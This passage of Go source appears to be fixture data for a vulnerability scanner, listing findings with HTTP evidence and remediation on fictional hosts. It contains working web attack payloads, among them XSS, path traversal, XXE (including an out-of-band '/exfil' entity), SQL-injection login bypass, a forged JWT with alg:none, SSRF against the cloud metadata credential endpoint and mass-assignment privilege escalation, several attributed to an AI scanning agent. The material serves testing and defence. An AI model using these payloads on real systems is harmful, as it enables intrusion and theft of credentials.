			FindingHash: hashStr([]byte("timing-anomaly-blog.test-/post/hello-world/comment-body")),
			FoundAt:     now.Add(-45 * time.Minute),
			CreatedAt:   now.Add(-45 * time.Minute),
		},
		// Content-type mismatch — JSON endpoint returns HTML on crafted input
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/orders")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			ModuleID:         "content-type-mismatch",
			ModuleName:       "content-type-mismatch",
			ModuleType:       database.ModuleTypePassive,
			ModuleShort:      "Detects content-type confusion between expected and actual response",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Endpoint normally returns application/json but switched to text/html when 'shipping' parameter contained angle brackets — content-type confusion may enable XSS in API consumers",
			Severity:         "suspect",
			Confidence:       "tentative",
			Tags:             []string{"anomaly", "content-type", "api-confusion"},
			MatchedAt:        []string{"https://api.shop.local/api/v1/orders"},
			ExtractedResults: []string{"expected_ct: application/json", "actual_ct: text/html", "trigger: angle brackets in shipping"},
			Request:          "POST /api/v1/orders HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n{\"product_id\":42,\"quantity\":1,\"shipping\":\"<script>alert(1)</script>\"}",
			Response:         "HTTP/1.1 400 Bad Request\r\nContent-Type: text/html\r\n\r\n<html><body><h1>Bad Request</h1><p>Invalid shipping method: <script>alert(1)</script></p></body></html>",
			FindingHash:      hashStr([]byte("content-type-mismatch-api.shop.local-/api/v1/orders-shipping")),
			FoundAt:          now.Add(-42 * time.Minute),
			CreatedAt:        now.Add(-42 * time.Minute),
		},
		// Reflection detection — input echoed in HTTP header
		{
			HTTPRecordUUIDs:  []string{findRec("/graphql")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "header-reflection",
			ModuleName:       "header-reflection",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects user input reflection in HTTP response headers",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "User-controlled input from GraphQL query variable reflected in X-Debug-Query response header — header injection or information leak possible",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "reflection", "header-injection"},
			MatchedAt:        []string{"https://example.com/graphql"},
			ExtractedResults: []string{"reflected_in: X-Debug-Query header", "input: { user(id: 1) }"},
			Request:          "POST /graphql HTTP/1.1\r\nHost: example.com\r\nContent-Type: application/json\r\n\r\n{\"query\":\"{ user(id: 1) { name email role } }\"}",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nX-Debug-Query: { user(id: 1) { name email role } }\r\n\r\n{\"data\":{\"user\":{\"name\":\"admin\",\"email\":\"admin@example.com\",\"role\":\"superuser\"}}}",
			FindingHash:      hashStr([]byte("header-reflection-example.com-/graphql-query")),
			FoundAt:          now.Add(-38 * time.Minute),
			CreatedAt:        now.Add(-38 * time.Minute),
		},
		// Encoding bypass — double URL encoding accepted
		{
			HTTPRecordUUIDs:  []string{findRec("/admin/logs")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "encoding-bypass",
			ModuleName:       "encoding-bypass",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects multi-layer URL decoding bypass",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Double URL-encoded path traversal in 'file' parameter decoded by server — %252e%252e%252f interpreted as ../, suggesting multi-layer decoding",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "encoding", "double-decode", "path-traversal"},
			MatchedAt:        []string{"https://admin.example.com:8443/admin/logs?file=%252e%252e%252fetc%252fhosts"},
			ExtractedResults: []string{"%252e%252e%252f → ../", "decoded_path: ../etc/hosts"},
			Request:          "GET /admin/logs?file=%252e%252e%252fetc%252fhosts HTTP/1.1\r\nHost: admin.example.com:8443\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n127.0.0.1 localhost\n::1 localhost\n10.0.0.50 api.shop.local\n10.0.0.51 db.internal",
			FindingHash:      hashStr([]byte("encoding-bypass-admin.example.com-/admin/logs-file")),
			FoundAt:          now.Add(-35 * time.Minute),
			CreatedAt:        now.Add(-35 * time.Minute),
		},
		// HTTP method override — POST treated as DELETE via X-HTTP-Method-Override
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/products/42")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			ModuleID:         "method-override",
			ModuleName:       "method-override",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects HTTP method override via headers",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "X-HTTP-Method-Override header accepted — POST request with X-HTTP-Method-Override: DELETE returned 204 No Content, bypassing method restrictions",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "method-override", "access-control"},
			MatchedAt:        []string{"https://api.shop.local/api/v1/products/42"},
			ExtractedResults: []string{"override_header: X-HTTP-Method-Override", "effective_method: DELETE", "status: 204"},
			Request:          "POST /api/v1/products/42 HTTP/1.1\r\nHost: api.shop.local\r\nX-HTTP-Method-Override: DELETE\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n",
			Response:         "HTTP/1.1 204 No Content\r\n\r\n",
			AdditionalEvidence: []string{
				"POST /api/v1/products/42 HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n\n---------\nHTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"id\":42,\"name\":\"Widget Pro\",\"price\":29.99}",
			},
			FindingHash: hashStr([]byte("method-override-api.shop.local-/api/v1/products")),
			FoundAt:     now.Add(-32 * time.Minute),
			CreatedAt:   now.Add(-32 * time.Minute),
		},
		// SOAP parameter manipulation — XML entity processed
		{
			HTTPRecordUUIDs:  []string{findRec("/api/soap/UserService")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "xml-entity-probe",
			ModuleName:       "xml-entity-probe",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects XML external entity processing in SOAP/XML endpoints",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "XML external entity reference in SOAP body not rejected — server processed &amp;xxe; entity without error, response size changed from 1800B to 1200B suggesting entity expansion or error",
			Severity:         "suspect",
			Confidence:       "tentative",
			Tags:             []string{"behavior", "xxe", "xml", "soap"},
			MatchedAt:        []string{"https://example.com/api/soap/UserService"},
			ExtractedResults: []string{"baseline_size: 1800B", "injected_size: 1200B", "entity: &xxe;"},
			Request:          "POST /api/soap/UserService HTTP/1.1\r\nHost: example.com\r\nContent-Type: text/xml; charset=UTF-8\r\nSOAPAction: GetUser\r\n\r\n<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><GetUser><ID>&xxe;</ID></GetUser></soap:Body></soap:Envelope>",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/xml; charset=UTF-8\r\n\r\n<?xml version=\"1.0\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><GetUserResponse><Error>User not found</Error></GetUserResponse></soap:Body></soap:Envelope>",
			FindingHash:      hashStr([]byte("xml-entity-probe-example.com-/api/soap/UserService")),
			FoundAt:          now.Add(-28 * time.Minute),
			CreatedAt:        now.Add(-28 * time.Minute),
		},
		// Cookie reflection — session cookie value reflected in response body
		{
			HTTPRecordUUIDs:  []string{findRec("/account/preferences")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "cookie-reflection",
			ModuleName:       "cookie-reflection",
			ModuleType:       database.ModuleTypePassive,
			ModuleShort:      "Detects cookie value reflection in response body",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Session cookie value 'theme=dark' reflected verbatim in HTML response body inside a <script> block — cookie-based XSS vector if cookie is controllable",
			Severity:         "suspect",
			Confidence:       "tentative",
			Tags:             []string{"behavior", "cookie", "reflection", "xss-vector"},
			MatchedAt:        []string{"https://example.com/account/preferences"},
			ExtractedResults: []string{"cookie: theme=dark", "context: script block", "reflected_value: dark"},
			Request:          "GET /account/preferences HTTP/1.1\r\nHost: example.com\r\nCookie: session=xyz789; theme=dark; lang=en; _ga=GA1.2.123456\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<!DOCTYPE html>\n<html><head><title>Preferences</title>\n<script>var userTheme = \"dark\";</script></head>\n<body>\n<h1>Your Preferences</h1>\n<p>Current theme: dark</p>\n</body></html>",
			FindingHash:      hashStr([]byte("cookie-reflection-example.com-/account/preferences-theme")),
			FoundAt:          now.Add(-25 * time.Minute),
			CreatedAt:        now.Add(-25 * time.Minute),
		},

		// =====================================================================
		// Agent findings — from autopilot/swarm/query agent modes
		// =====================================================================

		// Agent: IDOR found by autopilot agent
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/users/me")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			AgenticScanUUID:  "agent-0002-aaaa-bbbb-cccc-ddddeeee0002",
			URL:              "https://api.shop.local/api/v1/users/2",
			Hostname:         "api.shop.local",
			ModuleID:         "agent-idor",
			ModuleName:       "Agent IDOR Detection",
			ModuleType:       database.ModuleTypeAgent,
			ModuleShort:      "AI agent detected insecure direct object reference",
			FindingSource:    database.FindingSourceAgent,
			Description:      "IDOR in user profile endpoint — authenticated user can access other users' profiles by changing the user ID in the URL path. Agent confirmed by comparing response for own ID (1) vs another user's ID (2)",
			Severity:         "high",
			Confidence:       "certain",
			Tags:             []string{"agent", "idor", "access-control", "owasp-a1", "cwe-639"},
			Status:           "triaged",
			Remediation:      "Implement authorization check: verify the authenticated user's ID matches the requested resource ID, or restrict to admin role",
			CWEID:            "CWE-639",
			CVSSScore:        7.5,
			MatchedAt:        []string{"https://api.shop.local/api/v1/users/2"},
			ExtractedResults: []string{"user_id: 2 (not owned)", "leaked_fields: email, name, role, api_key"},
			Request:          "GET /api/v1/users/2 HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"id\":2,\"email\":\"jane@shop.local\",\"name\":\"Jane Doe\",\"role\":\"user\",\"api_key\":\"sk-live-jane-secret-key\",\"created_at\":\"2025-12-01T10:00:00Z\"}",
			AdditionalEvidence: []string{
				"GET /api/v1/users/1 HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n\n---------\nHTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"id\":1,\"email\":\"user@shop.local\",\"name\":\"Shop Admin\",\"role\":\"admin\",\"api_key\":\"sk-live-abc123xyz789def456\"}",
				"Agent reasoning: Compared user/1 (own profile) with user/2 (other user). Both return 200 with full PII including api_key. No authorization boundary between users.",
			},
			FindingHash: hashStr([]byte("agent-idor-api.shop.local-/api/v1/users")),
			FoundAt:     now.Add(-2*time.Hour - 28*time.Minute),
			CreatedAt:   now.Add(-2*time.Hour - 28*time.Minute),
		},
		// Agent: Mass assignment found by swarm agent
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/users/me")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			AgenticScanUUID:  "agent-0003-aaaa-bbbb-cccc-ddddeeee0003",
			URL:              "https://api.shop.local/api/v1/users/me",
			Hostname:         "api.shop.local",
			ModuleID:         "agent-mass-assignment",
			ModuleName:       "Agent Mass Assignment",
			ModuleType:       database.ModuleTypeAgent,
			ModuleShort:      "AI agent detected mass assignment vulnerability",
			FindingSource:    database.FindingSourceAgent,
			Description:      "Mass assignment allows privilege escalation — PATCH /api/v1/users/me accepts 'role' field, allowing any authenticated user to set their own role to 'admin'. Agent confirmed by sending PATCH with {\"role\":\"admin\"} and verifying the role change in subsequent GET",
			Severity:         "critical",
			Confidence:       "certain",
			Tags:             []string{"agent", "mass-assignment", "privilege-escalation", "cwe-915"},
			Status:           "triaged",
			Remediation:      "Add an allowlist of updatable fields in the PATCH handler. Exclude 'role', 'is_admin', and other privilege fields from user-modifiable attributes",
			CWEID:            "CWE-915",
			CVSSScore:        9.1,
			MatchedAt:        []string{"https://api.shop.local/api/v1/users/me"},
			ExtractedResults: []string{"field: role", "before: user", "after: admin"},
			Request:          "PATCH /api/v1/users/me HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n{\"name\":\"Shop Admin\",\"role\":\"admin\"}",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"id\":1,\"email\":\"user@shop.local\",\"name\":\"Shop Admin\",\"role\":\"admin\",\"updated_at\":\"2026-03-29T10:30:00Z\"}",
			AdditionalEvidence: []string{
				"Verification — GET after PATCH:\nGET /api/v1/users/me HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n\n---------\nHTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"id\":1,\"email\":\"user@shop.local\",\"name\":\"Shop Admin\",\"role\":\"admin\",\"api_key\":\"sk-live-abc123xyz789def456\"}",
				"Agent reasoning: Source analysis of app/routes/users.py:34 showed User.update(**request.json()) without field filtering. Confirmed by sending role field in PATCH body — server accepted and persisted the role change.",
			},
			FindingHash: hashStr([]byte("agent-mass-assign-api.shop.local-/api/v1/users/me")),
			FoundAt:     now.Add(-1*time.Hour - 15*time.Minute),
			CreatedAt:   now.Add(-1*time.Hour - 15*time.Minute),
		},
		// Agent: Auth bypass found by query agent (code review)
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/auth/login")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			AgenticScanUUID:  "agent-0001-aaaa-bbbb-cccc-ddddeeee0001",
			URL:              "https://api.shop.local/api/v1/auth/login",
			Hostname:         "api.shop.local",
			ModuleID:         "agent-auth-bypass",
			ModuleName:       "Agent Authentication Bypass",
			ModuleType:       database.ModuleTypeAgent,
			ModuleShort:      "AI agent detected authentication bypass via code review",
			FindingSource:    database.FindingSourceAgent,
			Description:      "Authentication bypass via SQL injection in login endpoint — source review identified raw SQL in auth handler. Agent crafted payload that bypasses password check: username=' OR 1=1-- returns first user (admin) token",
			Severity:         "critical",
			Confidence:       "certain",
			Tags:             []string{"agent", "auth-bypass", "sqli", "cwe-287"},
			Status:           "triaged",
			Remediation:      "Use parameterized queries in the login handler and implement rate limiting. Replace: f\"SELECT * FROM users WHERE username='{username}'\" with db.execute(\"SELECT * FROM users WHERE username = ?\", [username])",
			CWEID:            "CWE-287",
			CVSSScore:        9.8,
			SourceFile:       "/opt/repos/shop-api/app/routes/auth.py:28",
			MatchedAt:        []string{"https://api.shop.local/api/v1/auth/login", "/opt/repos/shop-api/app/routes/auth.py:28"},
			ExtractedResults: []string{"payload: ' OR 1=1--", "bypassed_user: admin", "token_leaked: true"},
			Request:          "POST /api/v1/auth/login HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\n\r\n{\"username\":\"' OR 1=1--\",\"password\":\"anything\"}",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"token\":\"eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.fake-jwt-sig\",\"user\":{\"id\":1,\"name\":\"admin\",\"role\":\"admin\"}}",
			AdditionalEvidence: []string{
				"Source: app/routes/auth.py:25-35\n---------\n@router.post(\"/api/v1/auth/login\")\nasync def login(creds: LoginSchema):\n    query = f\"SELECT * FROM users WHERE username='{creds.username}' AND password='{hash(creds.password)}'\"\n    user = await db.fetch_one(query)\n    if user:\n        token = create_jwt(user)\n        return {\"token\": token, \"user\": user}\n    raise HTTPException(401, \"Invalid credentials\")",
				"Normal login attempt:\nPOST /api/v1/auth/login HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\n\r\n{\"username\":\"admin\",\"password\":\"wrong\"}\n---------\nHTTP/1.1 401 Unauthorized\r\nContent-Type: application/json\r\n\r\n{\"detail\":\"Invalid credentials\"}",
			},
			FindingHash: hashStr([]byte("agent-auth-bypass-api.shop.local-/api/v1/auth/login")),
			FoundAt:     now.Add(-2*time.Hour - 55*time.Minute),
			CreatedAt:   now.Add(-2*time.Hour - 55*time.Minute),
		},
		// Agent: SSRF found by swarm agent
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/products")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			AgenticScanUUID:  "agent-0003-aaaa-bbbb-cccc-ddddeeee0003",
			URL:              "https://api.shop.local/api/v1/products/import",
			Hostname:         "api.shop.local",
			ModuleID:         "agent-ssrf",
			ModuleName:       "Agent SSRF Detection",
			ModuleType:       database.ModuleTypeAgent,
			ModuleShort:      "AI agent detected server-side request forgery",
			FindingSource:    database.FindingSourceAgent,
			Description:      "SSRF via product import URL — the import endpoint fetches a user-supplied URL to import product data. Agent redirected the request to internal metadata endpoint and received cloud instance credentials",
			Severity:         "critical",
			Confidence:       "certain",
			Tags:             []string{"agent", "ssrf", "cloud-metadata", "cwe-918"},
			Status:           "triaged",
			Remediation:      "Implement URL allowlist for import sources. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 169.254.x) and cloud metadata endpoints",
			CWEID:            "CWE-918",
			CVSSScore:        9.1,
			MatchedAt:        []string{"https://api.shop.local/api/v1/products/import"},
			ExtractedResults: []string{"internal_url: http://169.254.169.254/latest/meta-data/iam/security-credentials/", "leaked: AWS IAM credentials"},
			Request:          "POST /api/v1/products/import HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n{\"source_url\":\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"}",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"error\":\"invalid JSON format\",\"raw_content\":\"{\\\"Code\\\":\\\"Success\\\",\\\"AccessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"SecretAccessKey\\\":\\\"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\\\"}\"}",
			AdditionalEvidence: []string{
				"Step 1 — Agent tested with external URL:\nPOST /api/v1/products/import HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\n\r\n{\"source_url\":\"https://example.com/products.json\"}\n---------\nHTTP/1.1 200 OK\r\n\r\n{\"imported\":0,\"message\":\"No valid products found\"}",
				"Step 2 — Agent tested internal network:\nPOST /api/v1/products/import HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\n\r\n{\"source_url\":\"http://127.0.0.1:8080/admin\"}\n---------\nHTTP/1.1 200 OK\r\n\r\n{\"error\":\"invalid JSON format\",\"raw_content\":\"<html><title>Internal Admin</title></html>\"}",
			},
			FindingHash: hashStr([]byte("agent-ssrf-api.shop.local-/api/v1/products/import")),
			FoundAt:     now.Add(-1*time.Hour - 10*time.Minute),
			CreatedAt:   now.Add(-1*time.Hour - 10*time.Minute),
		},

		// =====================================================================
		// Extension finding — from custom JS extension
		// =====================================================================
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/auth/login")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			URL:              "https://api.shop.local/api/v1/auth/login",
			Hostname:         "api.shop.local",
			ModuleID:         "ext-jwt-none-algo",
			ModuleName:       "JWT None Algorithm",
			ModuleType:       database.ModuleTypeExtension,
			ModuleShort:      "Custom JS extension detects JWT 'none' algorithm bypass",
			FindingSource:    database.FindingSourceExtension,
			Description:      "JWT 'none' algorithm accepted — modified JWT token with alg:none and empty signature is accepted by the server, allowing forged tokens without the signing key",
			Severity:         "critical",
			Confidence:       "certain",
			Tags:             []string{"extension", "jwt", "auth-bypass", "cwe-347"},
			Status:           "triaged",
			Remediation:      "Explicitly reject 'none' algorithm in JWT verification. Set allowedAlgorithms: ['HS256', 'RS256'] in the JWT library configuration",
			CWEID:            "CWE-347",
			CVSSScore:        9.1,
			MatchedAt:        []string{"https://api.shop.local/api/v1/users/me"},
			ExtractedResults: []string{"original_alg: HS256", "forged_alg: none", "forged_role: admin"},
			Request:          "GET /api/v1/users/me HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"id\":1,\"email\":\"user@shop.local\",\"name\":\"Shop Admin\",\"role\":\"admin\"}",
			AdditionalEvidence: []string{
				"Original token (HS256): eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoidXNlciJ9.valid-sig\nForged token (none): eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.",
			},
			FindingHash: hashStr([]byte("ext-jwt-none-api.shop.local")),
			FoundAt:     now.Add(-1*time.Hour - 20*time.Minute),
			CreatedAt:   now.Add(-1*time.Hour - 20*time.Minute),
		},

		// =====================================================================
		// OAST finding — out-of-band interaction
		// =====================================================================
		{
			HTTPRecordUUIDs:  []string{findRec("/api/soap/UserService")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			URL:              "https://example.com/api/soap/UserService",
			Hostname:         "example.com",
			ModuleID:         "oast-xxe-oob",
			ModuleName:       "XXE Out-of-Band",
			ModuleType:       database.ModuleTypeOAST,
			ModuleShort:      "Detects XXE via out-of-band DNS/HTTP interaction",
			FindingSource:    database.FindingSourceOAST,
			Description:      "Blind XXE confirmed via out-of-band DNS callback — XML entity triggered DNS lookup to attacker-controlled domain, confirming the XML parser processes external entities",
			Severity:         "high",
			Confidence:       "certain",
			Tags:             []string{"oast", "xxe", "xml", "blind", "oob", "cwe-611"},
			Status:           "triaged",
			Remediation:      "Disable external entity processing in the XML parser. For Java: factory.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true)",
			CWEID:            "CWE-611",
			CVSSScore:        7.5,
			MatchedAt:        []string{"https://example.com/api/soap/UserService"},
			ExtractedResults: []string{"oast_domain: xxe-probe.oast.xevon.io", "interaction_type: dns", "dns_query: xxe-probe.oast.xevon.io", "source_ip: 10.0.0.50"},
			Request:          "POST /api/soap/UserService HTTP/1.1\r\nHost: example.com\r\nContent-Type: text/xml; charset=UTF-8\r\nSOAPAction: GetUser\r\n\r\n<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://xxe-probe.oast.xevon.io/exfil\">]><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><GetUser><ID>&xxe;</ID></GetUser></soap:Body></soap:Envelope>",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/xml; charset=UTF-8\r\n\r\n<?xml version=\"1.0\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><GetUserResponse><Error>User not found</Error></GetUserResponse></soap:Body></soap:Envelope>",
			AdditionalEvidence: []string{
				"OAST interaction received:\nTimestamp: 2026-03-29T08:15:32Z\nType: DNS\nQuery: xxe-probe.oast.xevon.io\nSource IP: 10.0.0.50\nCorrelation ID: xxe-probe\n---------\nThe DNS query originated from the target server IP (10.0.0.50 = api.shop.local) confirming server-side entity resolution.",
			},
			FindingHash: hashStr([]byte("oast-xxe-oob-example.com-/api/soap/UserService")),
			FoundAt:     now.Add(-50 * time.Minute),
			CreatedAt:   now.Add(-50 * time.Minute),
		},
		// OAST: Blind SSRF via out-of-band callback
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/products")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			URL:              "https://api.shop.local/api/v1/webhooks",
			Hostname:         "api.shop.local",
			ModuleID:         "oast-ssrf-callback",
			ModuleName:       "SSRF Out-of-Band Callback",
			ModuleType:       database.ModuleTypeOAST,
			ModuleShort:      "Detects blind SSRF via out-of-band HTTP callback",
			FindingSource:    database.FindingSourceOAST,
			Description:      "Blind SSRF confirmed via HTTP callback — webhook URL parameter triggered HTTP request to OAST server with internal headers (X-Internal-Token) leaked in the callback",
			Severity:         "high",
			Confidence:       "certain",
			Tags:             []string{"oast", "ssrf", "blind", "webhook", "cwe-918"},
			Status:           "triaged",
			Remediation:      "Validate webhook URLs against an allowlist of trusted domains. Block requests to private IP ranges and metadata endpoints",
			CWEID:            "CWE-918",
			CVSSScore:        7.5,
			MatchedAt:        []string{"https://api.shop.local/api/v1/webhooks"},
			ExtractedResults: []string{"oast_domain: ssrf-cb.oast.xevon.io", "interaction_type: http", "leaked_header: X-Internal-Token: intl-tok-a1b2c3"},
			Request:          "POST /api/v1/webhooks HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n{\"event\":\"order.completed\",\"callback_url\":\"http://ssrf-cb.oast.xevon.io/hook\"}",
			Response:         "HTTP/1.1 201 Created\r\nContent-Type: application/json\r\n\r\n{\"id\":\"wh-001\",\"event\":\"order.completed\",\"callback_url\":\"http://ssrf-cb.oast.xevon.io/hook\",\"status\":\"active\"}",
			AdditionalEvidence: []string{
				"OAST interaction received:\nTimestamp: 2026-03-29T08:20:15Z\nType: HTTP\nMethod: POST\nPath: /hook\nSource IP: 10.0.0.50\nHeaders:\n  User-Agent: ShopAPI/1.0\n  X-Internal-Token: intl-tok-a1b2c3\n  Content-Type: application/json\nBody: {\"event\":\"order.completed\",\"order_id\":\"test\"}",
			},
			FindingHash: hashStr([]byte("oast-ssrf-cb-api.shop.local-/api/v1/webhooks")),
			FoundAt:     now.Add(-47 * time.Minute),
			CreatedAt:   now.Add(-47 * time.Minute),
		},

		// =====================================================================
		// Known-issue-scan finding — from Nuclei templates
		// =====================================================================
		{
			HTTPRecordUUIDs:  []string{findRec("/admin/")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			URL:              "https://admin.example.com:8443/.env",
			Hostname:         "admin.example.com",
			ModuleID:         "nuclei-dotenv-exposure",
			ModuleName:       "Environment File Exposure",
			ModuleType:       database.ModuleTypeKnownIssueScan,
			ModuleShort:      "Detects exposed .env files with sensitive configuration",
			FindingSource:    database.FindingSourceKnownIssueScan,
			Description:      "Exposed .env file at /.env contains database credentials, API keys, and JWT secret in plaintext — accessible without authentication",
			Severity:         "high",
			Confidence:       "certain",
			Tags:             []string{"known-issue", "nuclei", "exposure", "config", "cwe-200"},
			Status:           "triaged",
			Remediation:      "Block access to .env files in web server configuration. Add 'location ~ /\\.env { deny all; }' to nginx config or equivalent",
			CWEID:            "CWE-200",
			CVSSScore:        7.5,
			MatchedAt:        []string{"https://admin.example.com:8443/.env"},
			ExtractedResults: []string{"DB_PASSWORD=p0stgr3s_pr0d!", "JWT_SECRET=sup3r-s3cret-k3y-d0nt-t3ll", "AWS_SECRET_ACCESS_KEY=wJalrXU..."},
			Request:          "GET /.env HTTP/1.1\r\nHost: admin.example.com:8443\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\nDATABASE_URL=postgresql://admin:p0stgr3s_pr0d!@db.internal:5432/shopdb\nJWT_SECRET=sup3r-s3cret-k3y-d0nt-t3ll\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nSMTP_PASSWORD=m@il_p@ss_123\nREDIS_URL=redis://cache.internal:6379",
			FindingHash:      hashStr([]byte("nuclei-dotenv-admin.example.com")),
			FoundAt:          now.Add(-3*time.Hour - 50*time.Minute),
			CreatedAt:        now.Add(-3*time.Hour - 50*time.Minute),
		},
		// Known-issue-scan: Spring Boot Actuator exposed
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/health")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			URL:              "https://api.shop.local/actuator/env",
			Hostname:         "api.shop.local",
			ModuleID:         "nuclei-springboot-actuator",
			ModuleName:       "Spring Boot Actuator Exposure",
			ModuleType:       database.ModuleTypeKnownIssueScan,
			ModuleShort:      "Detects exposed Spring Boot Actuator endpoints",
			FindingSource:    database.FindingSourceKnownIssueScan,
			Description:      "Spring Boot Actuator /actuator/env endpoint exposed without authentication — reveals environment variables including database credentials and internal service URLs",
			Severity:         "medium",
			Confidence:       "certain",
			Tags:             []string{"known-issue", "nuclei", "spring", "actuator", "cwe-200"},
			Status:           "accepted_risk",
			Remediation:      "Restrict actuator endpoints to internal network only. Set management.endpoints.web.exposure.include=health,info and bind management server to localhost",
			CWEID:            "CWE-200",
			CVSSScore:        5.3,
			MatchedAt:        []string{"https://api.shop.local/actuator/env"},
			ExtractedResults: []string{"spring.datasource.url=jdbc:postgresql://db.internal:5432/shopdb", "endpoints_exposed: env,beans,mappings,health"},
